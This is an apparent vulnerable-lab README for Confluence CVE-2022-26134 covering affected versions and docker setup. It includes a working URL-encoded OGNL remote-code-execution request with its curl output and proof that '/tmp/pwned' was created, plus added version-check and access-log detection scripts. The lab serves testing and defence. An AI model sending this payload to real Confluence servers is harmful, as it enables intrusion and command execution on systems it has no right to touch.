Confluence CVE-2022-26134 OGNL vulnerability

This vulnerability affects Confluence Server and Confluence Data Center. It allows an attacker to send a specially crafted HTTP request to abuse OGNL within Confluence, leading to remote code execution.

In order for this vulnerability to be exploitable, the following conditions must be met:

  • The Confluence version is below 7.4.17, 7.13.7, 7.14.3, 7.15.2, 7.16.4, 7.17.4 and 7.18.1 (the first release of each branch that is not affected)
  • Confluence has completed setup (a freshly installed server that has not been configured and is not connected to a database cannot be exploited)
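A small version check, added here as an example and not part of this lab repository, that applies the list above to a version string. It compares a build against the fix on its own major.minor branch; for branches with no listed fix (for example 7.5 to 7.12) it treats anything older than the newest fixed release as affected, which is this example's reading of "below" in the list, not something the README states explicitly.

```python
"""Version check for CVE-2022-26134 (added example, not part of the lab repo).

FIXED_VERSIONS is the list from the README.  A build is treated as affected
when it is older than the fix on its own major.minor branch, or when it sits
on a branch with no listed fix and is older than the newest fixed release.
That second rule is an assumption made by this example.
"""
from __future__ import annotations

FIXED_VERSIONS = ["7.4.17", "7.13.7", "7.14.3", "7.15.2", "7.16.4", "7.17.4", "7.18.1"]


def parse_version(text: str) -> tuple[int, ...]:
    """Turn '7.13.7' into (7, 13, 7) so versions compare numerically, not lexically."""
    parts = text.strip().split(".")
    if not parts or not all(p.isdigit() for p in parts):
        raise ValueError(f"not a numeric dotted version: {text!r}")
    return tuple(int(p) for p in parts)


def is_affected(version: str) -> bool:
    """True when `version` is older than the fix that applies to it."""
    fixed = [parse_version(v) for v in FIXED_VERSIONS]
    v = parse_version(version)
    # Fixes that belong to the same major.minor branch as the input.
    branch_fixes = [f for f in fixed if f[:2] == v[:2]]
    if branch_fixes:
        return v < min(branch_fixes)
    # No fix on this branch: assume affected if older than the newest fix.
    return v < max(fixed)


if __name__ == "__main__":
    # Constructed sample inputs for a quick table.
    for sample in ["7.4.16", "7.4.17", "7.5.2", "7.13.7", "7.18.0", "7.19.0", "8.0.0"]:
        print(f"{sample:>8}  {'AFFECTED' if is_affected(sample) else 'not affected'}")
```

Point it at the version shown in the Confluence footer or in `confluence.version` inside the container; an EOL branch with no fix still reports as affected, which is the conservative answer for patch planning.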

Running the application

Run it:

docker-compose up

Install Confluence

  1. Navigate to localhost:8090
  2. Get a trial license (setup will not proceed without one)
  3. Setup takes a while; make sure the host has 3-4 GB of RAM available
  4. Choose a test site/template and let Confluence manage users. Use the defaults for the admin account
  5. Once you are past the admin-creation step, you can run the exploit

Exploitation steps

curl -v http://localhost:8090/%24%7B%40java.lang.Runtime%40getRuntime%28%29.exec%28%22touch%20/tmp/pwned%22%29%7D/

Output:

└> curl -v http://localhost:8090/%24%7B%40java.lang.Runtime%40getRuntime%28%29.exec%28%22touch%20/tmp/pwned%22%29%7D/
*   Trying ::1...
* TCP_NODELAY set
* Connected to localhost (::1) port 8090 (#0)
> GET /%24%7B%40java.lang.Runtime%40getRuntime%28%29.exec%28%22touch%20/tmp/pwned%22%29%7D/ HTTP/1.1
> Host: localhost:8090
> User-Agent: curl/7.64.1
> Accept: */*
>
< HTTP/1.1 302
< Cache-Control: no-store
< Expires: Thu, 01 Jan 1970 00:00:00 GMT
< X-Confluence-Request-Time: 1654294225669
< Set-Cookie: JSESSIONID=A12C784ACFF928E9155587F78E9EC0C0; Path=/; HttpOnly
< X-XSS-Protection: 1; mode=block
< X-Content-Type-Options: nosniff
< X-Frame-Options: SAMEORIGIN
< Content-Security-Policy: frame-ancestors 'self'
< Location: /login.action?os_destination=%2F%24%7B%40java.lang.Runtime%40getRuntime%28%29.exec%28%22touch+%2Ftmp%2Fpwned%22%29%7D%2Findex.action&permissionViolation=true
< Content-Type: text/html;charset=UTF-8
< Content-Length: 0
< Date: Fri, 03 Jun 2022 22:10:25 GMT
<
* Connection #0 to host localhost left intact
* Closing connection 0
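On the detection side, the request above leaves a clear trace in the Confluence/Tomcat access log: an OGNL expression marker `${` in the request path once it is percent-decoded. The following scanner is an added example, not part of this lab repository; it parses access-log lines in the common combined layout (the sample lines are constructed, with the first one copied from the curl request on this page) and flags any request whose path decodes to contain `${`. Note that it deliberately ignores the HTTP status: the output above shows the server answering 302 while `touch /tmp/pwned` still ran, so filtering on 200 responses would miss successful exploitation.

```python
"""Flag CVE-2022-26134 style OGNL injection attempts in an access log.

Added example, not part of the lab repo.  The log layout assumed here is the
Tomcat "combined" format; the sample lines below are constructed for this
example.  The indicator is a literal "${" in the request path after
percent-decoding, which is how the curl request on this page carries its
payload.  Status codes are ignored on purpose: the server may redirect to
the login page (302) and still have evaluated the expression.
"""
from __future__ import annotations

import re
from urllib.parse import unquote

# Constructed sample lines: the README's own request, a double-encoded
# variant, and two benign requests that must not be flagged.
SAMPLE_LOG = """\
127.0.0.1 - - [03/Jun/2022:22:10:25 +0000] "GET /%24%7B%40java.lang.Runtime%40getRuntime%28%29.exec%28%22touch%20/tmp/pwned%22%29%7D/ HTTP/1.1" 302 0
10.0.0.7 - - [03/Jun/2022:22:11:02 +0000] "GET /%2524%257Btest%257D/ HTTP/1.1" 302 0
10.0.0.9 - admin [03/Jun/2022:22:12:40 +0000] "GET /login.action?os_destination=%2Fdashboard.action HTTP/1.1" 200 5123
10.0.0.9 - admin [03/Jun/2022:22:13:01 +0000] "POST /rest/api/content?expand=body.storage HTTP/1.1" 200 812
"""

LINE_RE = re.compile(
    r'^(?P<ip>\S+) \S+ (?P<user>\S+) \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) (?P<proto>[^"]+)" (?P<status>\d{3}) (?P<size>\S+)'
)


def fully_decode(s: str, max_rounds: int = 3) -> str:
    """Percent-decode until the string stops changing (bounded), so a marker
    sitting under an extra encoding layer is still seen as literal text."""
    for _ in range(max_rounds):
        decoded = unquote(s)
        if decoded == s:
            break
        s = decoded
    return s


def is_ognl_probe(target: str) -> bool:
    """True when the path part (before any '?') decodes to contain '${'.

    Only the path is inspected: the login redirect seen on this page echoes
    the original path inside the os_destination query parameter, and that
    follow-up request is not itself an injection."""
    path = target.split("?", 1)[0]
    return "${" in fully_decode(path)


def scan(log_text: str) -> list[dict]:
    """Return one finding per log line whose request path carries an OGNL marker."""
    findings = []
    for line in log_text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue  # not a combined-format line; skip rather than guess
        if is_ognl_probe(m["target"]):
            findings.append({
                "ip": m["ip"],
                "ts": m["ts"],
                "status": int(m["status"]),
                "decoded_path": fully_decode(m["target"].split("?", 1)[0]),
            })
    return findings


if __name__ == "__main__":
    for f in scan(SAMPLE_LOG):
        print(f"{f['ts']} {f['ip']} status={f['status']} path={f['decoded_path']}")
```

Run it over the container's Tomcat access log (or feed the same logic into a SIEM rule); a hit is worth checking against file-system changes such as the `/tmp/pwned` file shown in the next section.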

Exec into the container

└> docker exec -it vulnerable-confluence bash

root@b2db3bfbe364:/var/atlassian/application-data/confluence# ls -lah /tmp
total 12K
drwxrwxrwt 1 root       root       4.0K Jun  3 22:12 .
drwxr-xr-x 1 root       root       4.0K Jun  3 19:56 ..
drwxr-xr-x 2 confluence confluence 4.0K Jun  3 22:07 hsperfdata_confluence
-rw-r----- 1 confluence confluence    0 Jun  3 22:10 pwned